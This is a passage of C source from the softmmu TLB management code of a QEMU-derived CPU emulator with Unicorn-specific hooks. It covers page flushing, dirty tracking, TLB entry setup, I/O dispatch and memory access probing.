*uc, CPUTLBEntry *tlb_entry, target_ulong page) { if (tlb_hit_page_anyprot(uc, tlb_entry, page)) { memset(tlb_entry, -1, sizeof(*tlb_entry)); return true; } return false; } /* Called with tlb_c.lock held */ static inline void tlb_flush_vtlb_page_locked(CPUArchState *env, int mmu_idx, target_ulong page) { CPUTLBDesc *d = &env_tlb(env)->d[mmu_idx]; int k; // assert_cpu_is_self(env_cpu(env)); for (k = 0; k < CPU_VTLB_SIZE; k++) { if (tlb_flush_entry_locked(env->uc, &d->vtable[k], page)) { tlb_n_used_entries_dec(env, mmu_idx); } } } static void tlb_flush_page_locked(CPUArchState *env, int midx, target_ulong page) { target_ulong lp_addr = env_tlb(env)->d[midx].large_page_addr; target_ulong lp_mask = env_tlb(env)->d[midx].large_page_mask; /* Check if we need to flush due to large pages. */ if ((page & lp_mask) == lp_addr) { tlb_flush_one_mmuidx_locked(env, midx, get_clock_realtime()); } else { if (tlb_flush_entry_locked(env->uc, tlb_entry(env, midx, page), page)) { tlb_n_used_entries_dec(env, midx); } tlb_flush_vtlb_page_locked(env, midx, page); } } /** * tlb_flush_page_by_mmuidx_async_0: * @cpu: cpu on which to flush * @addr: page of virtual address to flush * @idxmap: set of mmu_idx to flush * * Helper for tlb_flush_page_by_mmuidx and friends, flush one page * at @addr from the tlbs indicated by @idxmap from @cpu. */ static void tlb_flush_page_by_mmuidx_async_0(CPUState *cpu, target_ulong addr, uint16_t idxmap) { CPUArchState *env = cpu->env_ptr; int mmu_idx; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { if ((idxmap >> mmu_idx) & 1) { tlb_flush_page_locked(env, mmu_idx, addr); } } tb_flush_jmp_cache(cpu, addr); } /** * tlb_flush_page_by_mmuidx_async_1: * @cpu: cpu on which to flush * @data: encoded addr + idxmap * * Helper for tlb_flush_page_by_mmuidx and friends, called through * async_run_on_cpu. The idxmap parameter is encoded in the page * offset of the target_ptr field. This limits the set of mmu_idx * that can be passed via this method. */ static void tlb_flush_page_by_mmuidx_async_1(CPUState *cpu, run_on_cpu_data data) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif target_ulong addr_and_idxmap = (target_ulong) data.target_ptr; target_ulong addr = addr_and_idxmap & TARGET_PAGE_MASK; uint16_t idxmap = addr_and_idxmap & ~TARGET_PAGE_MASK; tlb_flush_page_by_mmuidx_async_0(cpu, addr, idxmap); } typedef struct { target_ulong addr; uint16_t idxmap; } TLBFlushPageByMMUIdxData; /** * tlb_flush_page_by_mmuidx_async_2: * @cpu: cpu on which to flush * @data: allocated addr + idxmap * * Helper for tlb_flush_page_by_mmuidx and friends, called through * async_run_on_cpu. The addr+idxmap parameters are stored in a * TLBFlushPageByMMUIdxData structure that has been allocated * specifically for this helper. Free the structure when done. */ static void tlb_flush_page_by_mmuidx_async_2(CPUState *cpu, run_on_cpu_data data) { TLBFlushPageByMMUIdxData *d = data.host_ptr; tlb_flush_page_by_mmuidx_async_0(cpu, d->addr, d->idxmap); g_free(d); } void tlb_flush_page_by_mmuidx(CPUState *cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; // if (qemu_cpu_is_self(cpu)) { tlb_flush_page_by_mmuidx_async_0(cpu, addr, idxmap); //} #if 0 else if (idxmap < TARGET_PAGE_SIZE) { /* * Most targets have only a few mmu_idx. In the case where * we can stuff idxmap into the low TARGET_PAGE_BITS, avoid * allocating memory for this operation. */ tlb_flush_page_by_mmuidx_async_1(cpu, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { TLBFlushPageByMMUIdxData *d = g_new(TLBFlushPageByMMUIdxData, 1); /* Otherwise allocate a structure, freed by the worker. */ d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(cpu, RUN_ON_CPU_HOST_PTR(d)); } #endif } void tlb_flush_page(CPUState *cpu, target_ulong addr) { tlb_flush_page_by_mmuidx(cpu, addr, ALL_MMUIDX_BITS); } void tlb_flush_page_by_mmuidx_all_cpus(CPUState *src_cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = src_cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; /* * Allocate memory to hold addr+idxmap only when needed. * See tlb_flush_page_by_mmuidx for details. */ if (idxmap < TARGET_PAGE_SIZE) { flush_all_helper(src_cpu, tlb_flush_page_by_mmuidx_async_1, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { #if 0 CPUState *dst_cpu; /* Allocate a separate data block for each destination cpu. */ CPU_FOREACH(dst_cpu) { if (dst_cpu != src_cpu) { TLBFlushPageByMMUIdxData *d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(dst_cpu, RUN_ON_CPU_HOST_PTR(d)); } } #endif } tlb_flush_page_by_mmuidx_async_0(src_cpu, addr, idxmap); } void tlb_flush_page_all_cpus(CPUState *src, target_ulong addr) { tlb_flush_page_by_mmuidx_all_cpus(src, addr, ALL_MMUIDX_BITS); } void tlb_flush_page_by_mmuidx_all_cpus_synced(CPUState *src_cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = src_cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; /* * Allocate memory to hold addr+idxmap only when needed. * See tlb_flush_page_by_mmuidx for details. */ if (idxmap < TARGET_PAGE_SIZE) { flush_all_helper(src_cpu, tlb_flush_page_by_mmuidx_async_1, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); tlb_flush_page_by_mmuidx_async_1(src_cpu, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { //CPUState *dst_cpu; TLBFlushPageByMMUIdxData *d; #if 0 /* Allocate a separate data block for each destination cpu. */ CPU_FOREACH(dst_cpu) { if (dst_cpu != src_cpu) { d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(dst_cpu, RUN_ON_CPU_HOST_PTR(d)); } } #endif d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(src_cpu, RUN_ON_CPU_HOST_PTR(d)); } } void tlb_flush_page_all_cpus_synced(CPUState *src, target_ulong addr) { tlb_flush_page_by_mmuidx_all_cpus_synced(src, addr, ALL_MMUIDX_BITS); } /* update the TLBs so that writes to code in the virtual page 'addr' can be detected */ void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr) { cpu_physical_memory_test_and_clear_dirty(ram_addr, TARGET_PAGE_SIZE, DIRTY_MEMORY_CODE); } /* update the TLB so that writes in physical page 'phys_addr' are no longer tested for self modifying code */ void tlb_unprotect_code(struct uc_struct *uc, ram_addr_t ram_addr) { cpu_physical_memory_set_dirty_flag(ram_addr, DIRTY_MEMORY_CODE); } /* * Dirty write flag handling * * When the TCG code writes to a location it looks up the address in * the TLB and uses that data to compute the final address. If any of * the lower bits of the address are set then the slow path is forced. * There are a number of reasons to do this but for normal RAM the * most usual is detecting writes to code regions which may invalidate * generated code. * * Other vCPUs might be reading their TLBs during guest execution, so we update * te->addr_write with atomic_set. We don't need to worry about this for * oversized guests as MTTCG is disabled for them. * * Called with tlb_c.lock held. */ static void tlb_reset_dirty_range_locked(struct uc_struct *uc, CPUTLBEntry *tlb_entry, uintptr_t start, uintptr_t length) { uintptr_t addr = tlb_entry->addr_write; if ((addr & (TLB_INVALID_MASK | TLB_MMIO | TLB_DISCARD_WRITE | TLB_NOTDIRTY)) == 0) { addr &= TARGET_PAGE_MASK; addr += tlb_entry->addend; if ((addr - start) < length) { #if TCG_OVERSIZED_GUEST tlb_entry->addr_write |= TLB_NOTDIRTY; #else tlb_entry->addr_write = tlb_entry->addr_write | TLB_NOTDIRTY; #endif } } } static void tlb_reset_dirty_range_by_vaddr_locked(struct uc_struct *uc, CPUTLBEntry *tlb_entry, target_ulong start, target_ulong length) { uintptr_t addr = tlb_entry->addr_write; if ((addr & (TLB_INVALID_MASK | TLB_MMIO | TLB_DISCARD_WRITE | TLB_NOTDIRTY)) == 0) { addr &= TARGET_PAGE_MASK; if ((addr - start) < length) { #if TCG_OVERSIZED_GUEST tlb_entry->addr_write |= TLB_NOTDIRTY; #else tlb_entry->addr_write = tlb_entry->addr_write | TLB_NOTDIRTY; #endif } } } /* * Called with tlb_c.lock held. * Called only from the vCPU context, i.e. the TLB's owner thread. */ static inline void copy_tlb_helper_locked(CPUTLBEntry *d, const CPUTLBEntry *s) { *d = *s; } /* This is a cross vCPU call (i.e. another vCPU resetting the flags of * the target vCPU). * We must take tlb_c.lock to avoid racing with another vCPU update. The only * thing actually updated is the target TLB entry ->addr_write flags. */ void tlb_reset_dirty(CPUState *cpu, ram_addr_t start1, ram_addr_t length) { struct uc_struct *uc = cpu->uc; CPUArchState *env; int mmu_idx; env = cpu->env_ptr; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { unsigned int i; unsigned int n = tlb_n_entries(&env_tlb(env)->f[mmu_idx]); for (i = 0; i < n; i++) { tlb_reset_dirty_range_locked(uc, &env_tlb(env)->f[mmu_idx].table[i], start1, length); } for (i = 0; i < CPU_VTLB_SIZE; i++) { tlb_reset_dirty_range_locked(uc, &env_tlb(env)->d[mmu_idx].vtable[i], start1, length); } } } void tlb_reset_dirty_by_vaddr(CPUState *cpu, target_ulong start1, target_ulong length) { struct uc_struct *uc = cpu->uc; CPUArchState *env; int mmu_idx; env = cpu->env_ptr; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { unsigned int i; unsigned int n = tlb_n_entries(&env_tlb(env)->f[mmu_idx]); for (i = 0; i < n; i++) { tlb_reset_dirty_range_by_vaddr_locked(uc, &env_tlb(env)->f[mmu_idx].table[i], start1, length); } for (i = 0; i < CPU_VTLB_SIZE; i++) { tlb_reset_dirty_range_by_vaddr_locked(uc, &env_tlb(env)->d[mmu_idx].vtable[i], start1, length); } } } /* Called with tlb_c.lock held */ static inline void tlb_set_dirty1_locked(CPUTLBEntry *tlb_entry, target_ulong vaddr) { if (tlb_entry->addr_write == (vaddr | TLB_NOTDIRTY)) { tlb_entry->addr_write = vaddr; } } /* update the TLB corresponding to virtual page vaddr so that it is no longer dirty */ void tlb_set_dirty(CPUState *cpu, target_ulong vaddr) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif CPUArchState *env = cpu->env_ptr; int mmu_idx; // assert_cpu_is_self(cpu); vaddr &= TARGET_PAGE_MASK; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { tlb_set_dirty1_locked(tlb_entry(env, mmu_idx, vaddr), vaddr); } for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { int k; for (k = 0; k < CPU_VTLB_SIZE; k++) { tlb_set_dirty1_locked(&env_tlb(env)->d[mmu_idx].vtable[k], vaddr); } } } /* Our TLB does not support large pages, so remember the area covered by large pages and trigger a full TLB flush if these are invalidated. */ static void tlb_add_large_page(CPUArchState *env, int mmu_idx, target_ulong vaddr, target_ulong size) { target_ulong lp_addr = env_tlb(env)->d[mmu_idx].large_page_addr; target_ulong lp_mask = ~(size - 1); if (lp_addr == (target_ulong)-1) { /* No previous large page. */ lp_addr = vaddr; } else { /* Extend the existing region to include the new page. This is a compromise between unnecessary flushes and the cost of maintaining a full variable size TLB. */ lp_mask &= env_tlb(env)->d[mmu_idx].large_page_mask; while (((lp_addr ^ vaddr) & lp_mask) != 0) { lp_mask <<= 1; } } env_tlb(env)->d[mmu_idx].large_page_addr = lp_addr & lp_mask; env_tlb(env)->d[mmu_idx].large_page_mask = lp_mask; } /* Add a new TLB entry. At most one entry for a given virtual address * is permitted. Only a single TARGET_PAGE_SIZE region is mapped, the * supplied size is only used by tlb_flush_page. * * Called from TCG-generated code, which is under an RCU read-side * critical section. */ void tlb_set_page_with_attrs(CPUState *cpu, target_ulong vaddr, hwaddr paddr, MemTxAttrs attrs, int prot, int mmu_idx, target_ulong size) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif CPUArchState *env = cpu->env_ptr; CPUTLB *tlb = env_tlb(env); CPUTLBDesc *desc = &tlb->d[mmu_idx]; MemoryRegionSection *section; unsigned int index; target_ulong address; target_ulong write_address; uintptr_t addend; CPUTLBEntry *te, tn; hwaddr iotlb, xlat, sz, paddr_page; target_ulong vaddr_page; int asidx = cpu_asidx_from_attrs(cpu, attrs); int wp_flags; bool is_ram; // assert_cpu_is_self(cpu); if (size <= TARGET_PAGE_SIZE) { sz = TARGET_PAGE_SIZE; } else { tlb_add_large_page(env, mmu_idx, vaddr, size); sz = size; } vaddr_page = vaddr & TARGET_PAGE_MASK; paddr_page = paddr & TARGET_PAGE_MASK; section = address_space_translate_for_iotlb(cpu, asidx, paddr_page, &xlat, &sz, attrs, &prot); assert(sz >= TARGET_PAGE_SIZE); address = vaddr_page; if (size < TARGET_PAGE_SIZE) { /* Repeat the MMU check and TLB fill on every access. */ address |= TLB_INVALID_MASK; } if (attrs.byte_swap) { address |= TLB_BSWAP; } is_ram = memory_region_is_ram(section->mr); // is_romd = memory_region_is_romd(section->mr); if (is_ram) { /* RAM and ROMD both have associated host memory. */ addend = (uintptr_t)memory_region_get_ram_ptr(section->mr) + xlat; } else { /* I/O does not; force the host address to NULL. */ addend = 0; } write_address = address; if (is_ram) { iotlb = memory_region_get_ram_addr(section->mr) + xlat; /* * Computing is_clean is expensive; avoid all that unless * the page is actually writable. */ if (prot & PAGE_WRITE) { if (section->readonly) { write_address |= TLB_DISCARD_WRITE; } else if (cpu_physical_memory_is_clean(iotlb)) { write_address |= TLB_NOTDIRTY; } } } else { /* I/O or ROMD */ iotlb = memory_region_section_get_iotlb(cpu, section) + xlat; /* * Writes to romd devices must go through MMIO to enable write. * Reads to romd devices go through the ram_ptr found above, * but of course reads to I/O must go through MMIO. */ write_address |= TLB_MMIO; //if (!is_romd) { address = write_address; //} } wp_flags = cpu_watchpoint_address_matches(cpu, vaddr_page, TARGET_PAGE_SIZE); index = tlb_index(env, mmu_idx, vaddr_page); te = tlb_entry(env, mmu_idx, vaddr_page); /* Note that the tlb is no longer clean. */ tlb->c.dirty |= 1 << mmu_idx; /* Make sure there's no cached translation for the new page. */ tlb_flush_vtlb_page_locked(env, mmu_idx, vaddr_page); /* * Only evict the old entry to the victim tlb if it's for a * different page; otherwise just overwrite the stale data. */ if (!tlb_hit_page_anyprot(env->uc, te, vaddr_page) && !tlb_entry_is_empty(te)) { unsigned vidx = desc->vindex++ % CPU_VTLB_SIZE; CPUTLBEntry *tv = &desc->vtable[vidx]; /* Evict the old entry into the victim tlb. */ copy_tlb_helper_locked(tv, te); desc->viotlb[vidx] = desc->iotlb[index]; tlb_n_used_entries_dec(env, mmu_idx); } /* refill the tlb */ /* * At this point iotlb contains a physical section number in the lower * TARGET_PAGE_BITS, and either * + the ram_addr_t of the page base of the target RAM (RAM) * + the offset within section->mr of the page base (I/O, ROMD) * We subtract the vaddr_page (which is page aligned and thus won't * disturb the low bits) to give an offset which can be added to the * (non-page-aligned) vaddr of the eventual memory access to get * the MemoryRegion offset for the access. Note that the vaddr we * subtract here is that of the page base, and not the same as the * vaddr we add back in io_readx()/io_writex()/get_page_addr_code(). */ desc->iotlb[index].addr = iotlb - vaddr_page; desc->iotlb[index].attrs = attrs; /* Now calculate the new entry */ tn.addend = addend - vaddr_page; tn.paddr = paddr_page; if (prot & PAGE_READ) { tn.addr_read = address; if (wp_flags & BP_MEM_READ) { tn.addr_read |= TLB_WATCHPOINT; } } else { tn.addr_read = -1; } if (prot & PAGE_EXEC) { tn.addr_code = address; } else { tn.addr_code = -1; } tn.addr_write = -1; if (prot & PAGE_WRITE) { tn.addr_write = write_address; if (prot & PAGE_WRITE_INV) { tn.addr_write |= TLB_INVALID_MASK; } if (wp_flags & BP_MEM_WRITE) { tn.addr_write |= TLB_WATCHPOINT; } } copy_tlb_helper_locked(te, &tn); tlb_n_used_entries_inc(env, mmu_idx); } /* Add a new TLB entry, but without specifying the memory * transaction attributes to be used. */ void tlb_set_page(CPUState *cpu, target_ulong vaddr, hwaddr paddr, int prot, int mmu_idx, target_ulong size) { tlb_set_page_with_attrs(cpu, vaddr, paddr, MEMTXATTRS_UNSPECIFIED, prot, mmu_idx, size); } static inline ram_addr_t qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr) { ram_addr_t ram_addr; ram_addr = qemu_ram_addr_from_host(uc, ptr); if (ram_addr == RAM_ADDR_INVALID) { // error_report("Bad ram pointer %p", ptr); abort(); } return ram_addr; } /* * Note: tlb_fill() can trigger a resize of the TLB. This means that all of the * caller's prior references to the TLB table (e.g. CPUTLBEntry pointers) must * be discarded and looked up again (e.g. via tlb_entry()). */ static void tlb_fill(CPUState *cpu, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUClass *cc = CPU_GET_CLASS(cpu); #ifndef NDEBUG bool ok; /* * This is not a probe, so only valid return is success; failure * should result in exception + longjmp to the cpu loop. */ ok = cc->tlb_fill(cpu, addr, size, access_type, mmu_idx, false, retaddr); assert(ok); #else cc->tlb_fill(cpu, addr, size, access_type, mmu_idx, false, retaddr); #endif } static uint64_t io_readx(CPUArchState *env, CPUIOTLBEntry *iotlbentry, int mmu_idx, target_ulong addr, uintptr_t retaddr, MMUAccessType access_type, MemOp op) { CPUState *cpu = env_cpu(env); struct uc_struct *uc = cpu->uc; hwaddr mr_offset; MemoryRegionSection *section; MemoryRegion *mr; uint64_t val; MemTxResult r; section = iotlb_to_section(cpu, iotlbentry->addr, iotlbentry->attrs); mr = section->mr; mr_offset = (iotlbentry->addr & TARGET_PAGE_MASK) + addr; cpu->mem_io_pc = retaddr; if (!cpu->can_do_io) { cpu_io_recompile(cpu, retaddr); } r = memory_region_dispatch_read(uc, mr, mr_offset, &val, op, iotlbentry->attrs); if (r != MEMTX_OK) { #if 0 hwaddr physaddr = mr_offset + section->offset_within_address_space - section->offset_within_region; cpu_transaction_failed(cpu, physaddr, addr, memop_size(op), access_type, mmu_idx, iotlbentry->attrs, r, retaddr); #endif } return val; } static void io_writex(CPUArchState *env, CPUIOTLBEntry *iotlbentry, int mmu_idx, uint64_t val, target_ulong addr, uintptr_t retaddr, MemOp op) { CPUState *cpu = env_cpu(env); struct uc_struct *uc = env->uc; hwaddr mr_offset; MemoryRegionSection *section; MemoryRegion *mr; MemTxResult r; section = iotlb_to_section(cpu, iotlbentry->addr, iotlbentry->attrs); mr = section->mr; mr_offset = (iotlbentry->addr & TARGET_PAGE_MASK) + addr; if (!cpu->can_do_io) { cpu_io_recompile(cpu, retaddr); } cpu->mem_io_pc = retaddr; r = memory_region_dispatch_write(uc, mr, mr_offset, val, op, iotlbentry->attrs); if (r != MEMTX_OK) { #if 0 hwaddr physaddr = mr_offset + section->offset_within_address_space - section->offset_within_region; cpu_transaction_failed(cpu, physaddr, addr, memop_size(op), MMU_DATA_STORE, mmu_idx, iotlbentry->attrs, r, retaddr); #endif } } static inline target_ulong tlb_read_ofs(CPUTLBEntry *entry, size_t ofs) { #if TCG_OVERSIZED_GUEST return *(target_ulong *)((uintptr_t)entry + ofs); #else return *(target_ulong *)((uintptr_t)entry + ofs); #endif } /* Return true if ADDR is present in the victim tlb, and has been copied back to the main tlb. */ static bool victim_tlb_hit(CPUArchState *env, size_t mmu_idx, size_t index, size_t elt_ofs, target_ulong page) { size_t vidx; // assert_cpu_is_self(env_cpu(env)); for (vidx = 0; vidx < CPU_VTLB_SIZE; ++vidx) { CPUTLBEntry *vtlb = &env_tlb(env)->d[mmu_idx].vtable[vidx]; target_ulong cmp; #if TCG_OVERSIZED_GUEST cmp = *(target_ulong *)((uintptr_t)vtlb + elt_ofs); #else cmp = *(target_ulong *)((uintptr_t)vtlb + elt_ofs); #endif if (cmp == page) { /* Found entry in victim tlb, swap tlb and iotlb. */ CPUTLBEntry tmptlb, *tlb = &env_tlb(env)->f[mmu_idx].table[index]; copy_tlb_helper_locked(&tmptlb, tlb); copy_tlb_helper_locked(tlb, vtlb); copy_tlb_helper_locked(vtlb, &tmptlb); CPUIOTLBEntry tmpio, *io = &env_tlb(env)->d[mmu_idx].iotlb[index]; CPUIOTLBEntry *vio = &env_tlb(env)->d[mmu_idx].viotlb[vidx]; tmpio = *io; *io = *vio; *vio = tmpio; return true; } } return false; } /* Macro to call the above, with local variables from the use context. */ #define VICTIM_TLB_HIT(TY, ADDR) \ victim_tlb_hit(env, mmu_idx, index, offsetof(CPUTLBEntry, TY), \ (ADDR) & TARGET_PAGE_MASK) /* * Return a ram_addr_t for the virtual address for execution. * * Return -1 if we can't translate and execute from an entire page * of RAM. This will force us to execute by loading and translating * one insn at a time, without caching. * * NOTE: This function will trigger an exception if the page is * not executable. */ tb_page_addr_t get_page_addr_code_hostp(CPUArchState *env, target_ulong addr, void **hostp) { struct uc_struct *uc = env->uc; uintptr_t mmu_idx = cpu_mmu_index(env, true); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); void *p; if (unlikely(!tlb_hit(uc, entry->addr_code, addr))) { if (!VICTIM_TLB_HIT(addr_code, addr)) { tlb_fill(env_cpu(env), addr, 0, MMU_INST_FETCH, mmu_idx, 0); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); if (unlikely(entry->addr_code & TLB_INVALID_MASK)) { /* * The MMU protection covers a smaller range than a target * page, so we must redo the MMU check for every insn. */ return -1; } } assert(tlb_hit(uc, entry->addr_code, addr)); } if (unlikely(entry->addr_code & TLB_MMIO)) { /* The region is not backed by RAM. */ if (hostp) { *hostp = NULL; } return -1; } p = (void *)((uintptr_t)addr + entry->addend); if (hostp) { *hostp = p; } return qemu_ram_addr_from_host_nofail(env->uc, p); } tb_page_addr_t get_page_addr_code(CPUArchState *env, target_ulong addr) { return get_page_addr_code_hostp(env, addr, NULL); } static void notdirty_write(CPUState *cpu, vaddr mem_vaddr, unsigned size, CPUIOTLBEntry *iotlbentry, uintptr_t retaddr, MemoryRegion *mr) { ram_addr_t ram_addr = mem_vaddr + iotlbentry->addr; if (mr == NULL) { mr = cpu->uc->memory_mapping(cpu->uc, mem_vaddr); } if ((mr->perms & UC_PROT_EXEC) != 0) { struct page_collection *pages = page_collection_lock(cpu->uc, ram_addr, ram_addr + size); tb_invalidate_phys_page_fast(cpu->uc, pages, ram_addr, size, retaddr); page_collection_unlock(pages); } /* For exec pages, this is cleared in tb_gen_code. */ // If we: // - have memory hooks installed // - or doing snapshot // , then never clean the tlb if (!(cpu->uc->snapshot_level > 0 || mr->priority > 0) && !(HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_READ) || HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_WRITE))) { tlb_set_dirty(cpu, mem_vaddr); } } /* * Probe for whether the specified guest access is permitted. If it is not * permitted then an exception will be taken in the same way as if this * were a real access (and we will not return). * If the size is 0 or the page requires I/O access, returns NULL; otherwise, * returns the address of the host page similar to tlb_vaddr_to_host(). */ void *probe_access(CPUArchState *env, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr; size_t elt_ofs = 0; int wp_access = 0; #ifdef _MSC_VER g_assert(((target_ulong)0 - (addr | TARGET_PAGE_MASK)) >= size); #else g_assert(-(addr | TARGET_PAGE_MASK) >= size); #endif switch (access_type) { case MMU_DATA_LOAD: elt_ofs = offsetof(CPUTLBEntry, addr_read); wp_access = BP_MEM_READ; break; case MMU_DATA_STORE: elt_ofs = offsetof(CPUTLBEntry, addr_write); wp_access = BP_MEM_WRITE; break; case MMU_INST_FETCH: elt_ofs = offsetof(CPUTLBEntry, addr_code); wp_access = BP_MEM_READ; break; default: g_assert_not_reached(); } tlb_addr = tlb_read_ofs(entry, elt_ofs); if (unlikely(!tlb_hit(env->uc, tlb_addr, addr))) { if (!victim_tlb_hit(env, mmu_idx, index, elt_ofs, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); /* TLB resize via tlb_fill may have moved the entry. */ index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_read_ofs(entry, elt_ofs); } if (!size) { return NULL; } if (unlikely(tlb_addr & TLB_FLAGS_MASK)) { CPUIOTLBEntry *iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index]; /* Reject I/O access, or other required slow-path. */ if (tlb_addr & (TLB_MMIO | TLB_BSWAP | TLB_DISCARD_WRITE)) { return NULL; } /* Handle watchpoints. */ if (tlb_addr & TLB_WATCHPOINT) { cpu_check_watchpoint(env_cpu(env), addr, size, iotlbentry->attrs, wp_access, retaddr); } /* Handle clean RAM pages. */ if (tlb_addr & TLB_NOTDIRTY) { notdirty_write(env_cpu(env), addr, size, iotlbentry, retaddr, NULL); } } return (void *)((uintptr_t)addr + entry->addend); } void *tlb_vaddr_to_host(CPUArchState *env, abi_ptr addr, MMUAccessType access_type, int mmu_idx) { struct uc_struct *uc = env->uc; CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr, page; size_t elt_ofs = 0; switch (access_type) { case MMU_DATA_LOAD: elt_ofs = offsetof(CPUTLBEntry, addr_read); break; case MMU_DATA_STORE: elt_ofs = offsetof(CPUTLBEntry, addr_write); break; case MMU_INST_FETCH: elt_ofs = offsetof(CPUTLBEntry, addr_code); break; default: g_assert_not_reached(); } page = addr & TARGET_PAGE_MASK; tlb_addr = tlb_read_ofs(entry, elt_ofs); if (!tlb_hit_page(uc, tlb_addr, page)) { uintptr_t index = tlb_index(env, mmu_idx, addr); if (!victim_tlb_hit(env, mmu_idx, index, elt_ofs, page)) { CPUState *cs = env_cpu(env); CPUClass *cc = CPU_GET_CLASS(cs); if (!cc->tlb_fill(cs, addr, 0, access_type, mmu_idx, true, 0)) { /* Non-faulting page table read failed. */ return NULL; } /* TLB resize via tlb_fill may have moved the entry. */ entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_read_ofs(entry, elt_ofs); } if (tlb_addr & ~TARGET_PAGE_MASK) { /* IO access */ return NULL; } return (void *)((uintptr_t)addr + entry->addend); } /* Probe for a read-modify-write atomic operation. Do not allow unaligned * operations, or io operations to proceed. Return the host address. */ static void *atomic_mmu_lookup(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif size_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *tlbe = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = tlb_addr_write(tlbe); MemOp mop = get_memop(oi); int a_bits = get_alignment_bits(mop); int s_bits = mop & MO_SIZE; void *hostaddr; /* Adjust the given return address. */ retaddr -= GETPC_ADJ; /* Enforce guest required alignment. */ if (unlikely(a_bits > 0 && (addr & ((1 << a_bits) - 1)))) { /* ??? Maybe indicate atomic op to cpu_unaligned_access */ cpu_unaligned_access(env_cpu(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); } /* Enforce qemu required alignment. */ if (unlikely(addr & ((1 << s_bits) - 1))) { /* We get here if guest alignment was not requested, or was not enforced by cpu_unaligned_access above. We might widen the access and emulate, but for now mark an exception and exit the cpu loop. */ goto stop_the_world; } /* Check TLB entry and enforce page permissions. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!VICTIM_TLB_HIT(addr_write, addr)) { tlb_fill(env_cpu(env), addr, 1 << s_bits, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); tlbe = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(tlbe) & ~TLB_INVALID_MASK; } /* Notice an IO access or a needs-MMU-lookup access */ if (unlikely(tlb_addr & TLB_MMIO)) { /* There's really nothing that can be done to support this apart from stop-the-world. */ goto stop_the_world; } /* Let the guest notice RMW on a write-only page. */ if (unlikely(tlbe->addr_read != (tlb_addr & ~TLB_NOTDIRTY))) { tlb_fill(env_cpu(env), addr, 1 << s_bits, MMU_DATA_LOAD, mmu_idx, retaddr); /* Since we don't support reads and writes to different addresses, and we do have the proper page loaded for write, this shouldn't ever return. But just in case, handle via stop-the-world. */ goto stop_the_world; } hostaddr = (void *)((uintptr_t)addr + tlbe->addend); if (unlikely(tlb_addr & TLB_NOTDIRTY)) { notdirty_write(env_cpu(env), addr, 1 << s_bits, &env_tlb(env)->d[mmu_idx].iotlb[index], retaddr, NULL); } return hostaddr; stop_the_world: cpu_loop_exit_atomic(env_cpu(env), retaddr); } /* * Load Helpers * * We support two different access types. SOFTMMU_CODE_ACCESS is * specifically for reading instructions from system memory. It is * called by the translation loop and in some helpers where the code * is disassembled. It shouldn't be called directly by guest code. */ typedef uint64_t FullLoadHelper(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); static inline uint64_t load_memop(const void *haddr, MemOp op) { switch (op) { case MO_UB: return ldub_p(haddr); case MO_BEUW: return lduw_be_p(haddr); case MO_LEUW: return lduw_le_p(haddr); case MO_BEUL: return (uint32_t)ldl_be_p(haddr); case MO_LEUL: return (uint32_t)ldl_le_p(haddr); case MO_BEQ: return ldq_be_p(haddr); case MO_LEQ: return ldq_le_p(haddr); default: 